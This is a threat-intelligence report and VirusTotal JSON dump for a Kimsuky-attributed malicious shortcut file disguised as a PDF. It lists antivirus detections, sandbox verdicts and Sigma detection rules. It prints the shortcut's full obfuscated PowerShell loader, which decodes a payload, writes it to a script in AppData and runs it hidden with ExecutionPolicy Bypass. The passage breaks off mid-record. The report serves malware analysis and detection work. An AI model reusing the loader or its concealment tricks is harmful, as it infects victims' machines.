aa9d5dd632bb90addca480eaa5ff4382
Hash
- MD5: aa9d5dd632bb90addca480eaa5ff4382
- SHA1: 5746f3e78351439caebfa3721e8feea36b67263f
- SHA256: 4b0358c7e4afa54bc489a6199cca132b5f4a330892eb15bf06c0c4da9e020df2
- First Seen: 2026-05-15 (ingestion date on this platform; VirusTotal's `first_submission_date` 1773431430 and `first_seen_itw_date` 1773484316 both fall on 2026-03-13 UTC, so the sample had been circulating about two months before this date)
- Last Seen: 2026-05-15 (on this platform; VirusTotal `last_analysis_date` 1775023447 is 2026-04-01 UTC)
- Related Reports: 1
- Related IOCs: 0
Additional Information
VirusTotal
{
"data": {
"id": "4b0358c7e4afa54bc489a6199cca132b5f4a330892eb15bf06c0c4da9e020df2",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/4b0358c7e4afa54bc489a6199cca132b5f4a330892eb15bf06c0c4da9e020df2"
},
"attributes": {
"reputation": -143,
"type_tags": [
"windows",
"lnk"
],
"last_analysis_date": 1775023447,
"times_submitted": 2,
"popular_threat_classification": {
"suggested_threat_label": "trojan.pantera/kimsuky",
"popular_threat_name": [
{
"count": 7,
"value": "pantera"
},
{
"count": 5,
"value": "kimsuky"
},
{
"count": 2,
"value": "etset"
}
],
"popular_threat_category": [
{
"count": 19,
"value": "trojan"
},
{
"count": 3,
"value": "downloader"
}
]
},
"md5": "aa9d5dd632bb90addca480eaa5ff4382",
"type_description": "Windows shortcut",
"names": [
"PumpGuard-Pumpfun-AI-Attack-Defence-Requirements.pdf.lnk",
"PumpGuard-Pumpfun-AI-Attack-Defence-Requirements.pdf.lnk.unkc"
],
"unique_sources": 2,
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "2.0.0.1",
"engine_update": "20260331",
"category": "malicious",
"result": "LNK.ScriptQH.Trojan"
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan.WinLNK.Pantera.4!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260401",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.1A1B5CD7"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260401",
"category": "malicious",
"result": "lnk.trojan.kimsuky"
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260331",
"category": "malicious",
"result": "Lnk.Trojan.A24315479"
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260331",
"category": "malicious",
"result": "BehavesLike.Trojan.gl"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.214",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260331",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.1A1B5CD7"
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260330",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.44.59057",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.44.59057",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "61bd315:61bd315:389d672:389d672",
"engine_update": "20260331",
"category": "malicious",
"result": "HEUR:Trojan/LNK.Agent.b"
},
"Baidu": {
"method": "blacklist",
"engine_name": "Baidu",
"engine_version": "1.0.0.2",
"engine_update": "20190318",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1177",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260401",
"category": "malicious",
"result": "CL.Downloader!gen211"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260401",
"category": "malicious",
"result": "LNK/Kimsuky.AA trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260401",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260322",
"category": "malicious",
"result": "LNK:Kimsuky-K [Trj]"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260401",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260401",
"category": "malicious",
"result": "HEUR:Trojan.WinLNK.Agent.gen"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260401",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.1A1B5CD7"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan.PSRunner/LNK!1.BADE (CLASSIC)"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.3.1.0",
"engine_update": "20260401",
"category": "malicious",
"result": "Mal/LnkObf-A"
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260401",
"category": "malicious",
"result": "LNK.Downloader.1051"
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5572",
"engine_update": "20260330",
"category": "undetected",
"result": null
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260401",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14228",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan:Shortcut/SuspiciousLNK.SPCS!1"
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260401",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.1A1B5CD7 (B)"
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.4.16.0",
"engine_update": "20260331",
"category": "malicious",
"result": "Trojan-Downloader.PS.Agent"
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44063AVA:64.30942",
"engine_update": "20260401",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.1A1B5CD7"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1775019711",
"engine_update": "20260401",
"category": "malicious",
"result": "Detected"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan/Win32.Etset"
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.242.174",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38530",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260401",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.1A1B5CD7"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.23-113519295",
"engine_update": "20260401",
"category": "malicious",
"result": "Mal/LnkObf-A"
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26020.3",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan:Win32/Etset!rfn"
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260401",
"category": "malicious",
"result": "LNK/ABTrojan.CCMC-"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.29.3.10609",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.5.1",
"engine_update": "20260331",
"category": "malicious",
"result": "Trojan.Link.Crafted"
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-04-01.01",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260401",
"category": "malicious",
"result": "Win32.Trojan.Zdi-can-25373.Kqil"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260331",
"category": "malicious",
"result": "Trojan-JACI!AA9D5DD632BB"
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "undetected",
"result": null
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.30.0",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260322",
"category": "malicious",
"result": "LNK:Kimsuky-K [Trj]"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan:Win/Kimsuky.V"
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260330-04",
"engine_update": "20260331",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20251216",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260331",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.255",
"engine_update": "20260327",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.764",
"engine_update": "20260331",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260401",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.11.0",
"engine_update": "20260331",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260331",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260401",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260401",
"category": "type-unsupported",
"result": null
}
},
"trid": [
{
"file_type": "Windows Shortcut",
"probability": 100.0
}
],
"sha256": "4b0358c7e4afa54bc489a6199cca132b5f4a330892eb15bf06c0c4da9e020df2",
"last_submission_date": 1773472268,
"size": 420794,
"sandbox_verdicts": {
"Zenbox": {
"category": "malicious",
"malware_classification": [
"MALWARE",
"EVADER"
],
"sandbox_name": "Zenbox",
"confidence": 72
},
"Yomi Hunter": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Yomi Hunter"
},
"Dr.Web vxCube": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Dr.Web vxCube"
}
},
"first_submission_date": 1773431430,
"vhash": "fd332a119edee710ad36055b2def06f8",
"last_analysis_stats": {
"malicious": 36,
"suspicious": 0,
"undetected": 26,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 0,
"type-unsupported": 13
},
"last_modification_date": 1778745576,
"sha1": "5746f3e78351439caebfa3721e8feea36b67263f",
"meaningful_name": "PumpGuard-Pumpfun-AI-Attack-Defence-Requirements.pdf.lnk",
"first_seen_itw_date": 1773484316,
"tags": [
"executes-dropped-file",
"long-command-line-arguments",
"long-sleeps",
"detect-debug-environment",
"hiding-window",
"high-entropy",
"abused-exe-pattern",
"large-file",
"lnk"
],
"total_votes": {
"harmless": 0,
"malicious": 5
},
"lnk_info": {
"modification_date": "1970-01-01T00:00:00Z",
"link_flags": [
"HasName",
"IsUnicode",
"HasExprString",
"HasArguments",
"PreferEnvironmentPath",
"HasIconLocation"
],
"command_line_arguments": " \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 163 143 142 34 19 51 67 60 44 80 54 44 54 103 104 156 193 189 122 104 92 101 33 18 25 123 104 83 115 86 44 42 46 46 90 180 155 101 119 100 103 36 34 90 86 68 43 43 46 46 57 34 44 87 109 108 156 109 101 111 101 76 99 52 62 54 99 117 57 54 31 50 145 109 118 87 141 96 164 79 34 15 61 59 77 76 95 54 77 35 70 125 103 137 126 106 111 124 31 65 84 101 121 51 73 103 88 46 109 86 161 127 108 86 107 140 179 31 19 101 125 135 40 48 117 117 124 28 87 163 182 189 155 187 158 179 88 101 92 134 55 122 117 117 63 124 100 111 78 179 120 97 105 97 96 101 92 101 70 52 122 117 117 45 57 109 102 163 111 124 91 111 167 170 101 19 101 125 135 55 50 117 117 124 27 99 98 191 180 168 110 92 166 101 92 101 70 55 122 117 117 63 48 43 34 87 191 180 168 113 100 112 101 92 101 57 69 56 126 108 126 101 92 100 163 182 189 104 113 96 101 88 35 24 134 126 122 61 117 117 124 88 98 88 191 180 168 124 167 170 101 30 25 121 135 97 124 37 45 42 29 84 161 127 108 86 107 158 179 17 30 34 49 123 44 60 49 126 99 107 41 83 110 191 141 189 137 90 70 18 19 64 58 42 55 29 63 42 38 34 87 164 189 86 110 94 112 25 103 99 52 62 54 126 92 45 44 37 40 97 126 162 168 121 86 110 31 29 28 65 68 49 54 47 57 57 40 44 94 124 120 88 187 142 148 36 36 34 56 53 95 126 54 48 46 35 40 98 128 107 97 110 91 166 17 25 35 122 66 51 44 47 43 60 97 27 146 179 109 105 102 167 88 76 62 25 50 58 49 59 106 73 57 45 63 96 112 106 101 106 85 181 90 50 21 63 137 120 46 36 44 44 111 100 125 124 126 102 120 87 98 103 99 31 54 54 124 115 72 43 42 73 40 89 124 191 166 117 97 109 76 97 103 132 65 52 56 92 124 46 31 33 165 164 191 128 110 96 103 90 55 38 52 65 124 120 115 59 48 25 87 132 113 111 134 124 85 116 94 103 101 49 72 48 59 105 48 43 94 111 138 193 187 87 105 87 181 74 103 96 132 72 59 63 119 99 126 69 34 92 115 178 122 124 85 109 103 95 99 67 59 38 102 86 48 46 75 48 81 128 182 170 
187 102 102 28 20 89 56 54 107 126 92 128 122 45 30 85 164 189 163 178 165 115 20 19 21 125 130 106 114 35 40 42 109 86 161 121 108 90 160 137 90 70 18 19 64 58 42 55 29 63 42 38 34 87 164 189 86 110 94 112 25 103 96 125 133 40 53 49 117 119 109 86 95 111 117 103 160 167 109 35 29 32 99 87 87 46 46 44 103 87 94 81 120 106 168 162 136 114 36 34 23 52 108 122 63 39 48 50 38 46 100 109 118 91 111 154 95 25 35 89 65 64 40 56 34 62 112 25 94 151 111 126 83 187 76 154 62 25 17 57 62 55 115 64 59 60 61 44 84 108 122 87 105 169 168 50 21 30 136 133 58 45 39 128 113 71 44 100 125 122 88 106 169 177 31 20 23 136 124 77 43 35 90 53 35 44 165 189 126 105 124 142 130 19 38 21 52 124 76 46 40 61 57 28 30 165 113 112 83 120 87 98 31 34 27 60 137 111 95 37 57 41 34 44 87 109 147 97 106 85 181 101 90 57 57 89 42 49 49 55 50 42 113 152 156 103 101 122 84 97 30 24 25 88 58 48 55 52 39 126 77 24 85 128 108 87 189 156 143 30 27 34 136 133 59 63 54 126 126 98 58 92 115 123 91 102 118 97 14 27 34 136 97 51 60 51 59 48 84 106 138 193 187 87 105 87 181 11 103 56 51 53 111 90 46 52 57 111 100 127 120 115 101 141 104 97 31 103 99 56 57 44 128 106 91 48 44 34 97 120 113 99 189 116 129 65 79 76 136 133 59 61 35 55 47 33 113 136 193 145 101 102 156 130 36 31 34 68 52 48 59 51 76 61 28 38 132 126 107 97 110 91 181 90 66 15 67 70 39 44 50 128 119 63 34 78 124 109 119 117 100 105 27 89 34 48 68 117 128 106 95 44 40 28 88 124 113 86 189 162 168 48 30 25 68 58 37 77 35 39 50 42 113 125 120 123 102 120 91 181 90 25 24 56 137 124 115 73 49 48 70 35 81 124 109 105 122 85 108 17 34 103 123 91 45 80 37 49 56 38 37 96 193 178 133 101 100 114 18 19 30 57 59 76 49 43 55 59 22 113 131 104 111 105 106 86 181 90 68 24 59 60 59 50 51 128 124 105 113 74 189 126 104 122 169 152 103 61 24 63 59 111 80 54 44 54 111 105 161 124 113 84 163 136 101 23 67 38 52 72 115 128 59 126 39 46 37 96 179 111 87 172 109 179 76 97 103 132 72 58 61 92 35 124 104 86 165 189 107 88 116 98 110 34 21 103 107 137 78 59 32 115 75 44 41 
96 125 106 94 120 101 129 38 20 28 84 55 51 57 48 59 44 111 100 118 115 124 101 189 156 148 19 103 95 97 68 40 115 83 63 42 42 104 151 160 123 102 144 96 103 18 19 34 53 129 107 107 110 128 113 61 44 85 124 107 97 105 96 102 25 62 25 52 68 42 42 54 52 126 103 67 96 106 178 118 116 92 112 52 23 38 58 137 111 83 46 50 41 27 44 82 193 169 154 180 142 181 99 20 34 52 53 51 50 48 45 126 82 113 119 124 104 157 138 102 109 34 35 18 60 68 56 76 54 45 51 60 44 81 109 118 92 118 86 130 34 19 103 123 97 51 60 51 59 48 84 113 115 124 120 97 106 85 112 21 90 52 69 65 55 60 34 52 57 43 61 100 110 116 170 176 117 116 20 28 57 71 60 55 128 117 81 48 42 77 83 120 105 101 189 119 112 23 24 21 52 64 46 57 119 76 61 28 38 152 157 155 134 176 152 168 83 90 85 119 124 103 109 98 110 101 92 89 144 180 170 151 169 148 162 81 84 83 123 116 105 107 99 109 104 91 92 140 180 170 149 167 153 164 101 103 90 103 70 40 55 40 50 126 107 48 98 109 118 91 111 169 168 51 21 30 65 66 55 46 119 124 42 29 40 94 122 122 88 189 156 130 34 19 19 63 59 53 45 119 124 43 42 29 81 120 113 99 106 142 177 38 38 38 136 108 124 86 40 55 48 98 65 100 109 119 170 181 165 112 25 17 77 103 57 44 92 54 44 61 102 113 163 127 111 84 112 100 167 23 20 86 134 110 120 46 36 44 44 82 109 99 110 107 88 178 167 164 89 19 15 52 135 97 87 41 42 47 36 44 152 138 122 104 139 100 100 18 34 20 52 137 111 75 37 55 126 107 31 82 109 109 170 176 129 112 38 35 34 54 54 124 124 47 46 43 111 100 118 108 107 132 116 93 112 103 99 38 71 72 97 122 119 124 61 46 48 138 143 122 93 110 83 112 90 62 19 67 60 124 115 71 63 42 39 113 161 148 102 129 111 83 102 36 38 19 63 58 46 114 74 39 91 32 36 88 128 113 102 175 121 116 19 31 103 123 99 45 46 52 59 99\\\";$Length = $VIUSBvejbawf.Length;$CLOIJSfgiojvosef235sdb = New-Object System.Collections.ArrayList;[string] $date = $null;$m = 0;for($k = 0; $k -lt $Length; $k++){$date += $VIUSBvejbawf[$k];if($VIUSBvejbawf[$k] -eq \\\" \\\"){[void]$CLOIJSfgiojvosef235sdb.Add([byte] $date);$m++;$date = 
$null;continue;}}$Apkengsidefg = \\\"AB59097(*^zxcvbn \\\";[Byte[]]$pw = [System.Text.Encoding]::UTF8.GetBytes(\\\"$Apkengsidefg\\\");\r\n$pw_Length = $Apkengsidefg.Length;$MFibvfaibfeg2345fbdfg = New-Object System.Byte[]($CLOIJSfgiojvosef235sdb.Count);$j = 0;for($i = 0; $i -lt $CLOIJSfgiojvosef235sdb.Count; $i++){$pw_num = $pw[$j] + 103;if($pw_num -ge $CLOIJSfgiojvosef235sdb[$i]){$MFibvfaibfeg2345fbdfg[$i] = $pw_num - $CLOIJSfgiojvosef235sdb[$i];}else{$MFibvfaibfeg2345fbdfg[$i] = $CLOIJSfgiojvosef235sdb[$i];}$j++;if($j -eq $pw_Length){$j = 0;}}$qqpvm = [System.Text.Encoding]::UTF8.GetString($MFibvfaibfeg2345fbdfg);$fgfw98JHGVfeg = \\\"$env:appdata\\firefox.ps1\\\";$qqpvm|Out-File -FilePath $fgfw98JHGVfeg;powershell -windowstyle hidden -ExecutionPolicy Bypass $fgfw98JHGVfeg;\"\r\n",
"icon_location": "%ProgramFiles%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe",
"creation_date": "1970-01-01T00:00:00Z",
"header": {
"show_window": 7,
"file_size": 0,
"hot_key": "(0+0)",
"show_window_str": "SW_SHOWMINNOACTIVE"
},
"access_date": "1970-01-01T00:00:00Z"
},
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 1,
"medium": 5,
"low": 5
}
},
"ssdeep": "192:88q56shgC/bYXMEfdMlGLgkGvbkqW4vvff2qjQB5cU+rcfuWYKlJOcIl7Il7Il7s:Zq3IWSJRfuWYG3",
"type_extension": "lnk",
"filecondis": {
"raw_md5": "49a68431d9647f2ce4370cf3f4b57281",
"dhash": "b3a0b49a90a2a282"
},
"type_tag": "lnk",
"tlsh": "T117947021F6FC4D31ED2A799264FC1DF0ACE64FB418851E5F0C32BA68635EA80FD95249",
"magika": "LNK",
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "fe226328e3589518f77bd1ce4b456e119e55dde2c461f9c95e33b4e2a9f4373d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious LNK Command-Line Padding with Whitespace Characters",
"rule_description": "Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).\nAdversaries insert non-printable whitespace characters (e.g., Line Feed \\x0A, Carriage Return \\x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.\nThe hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion\u2014commonly used for social engineering attacks.\nThis rule flags suspicious use of such padding observed in real-world attacks.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "06b48fa7870d38bdf92b4d4a9b9c4a4df779bd405fdc5ba0e70911df20027ce1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Change PowerShell Policies to an Insecure Level",
"rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
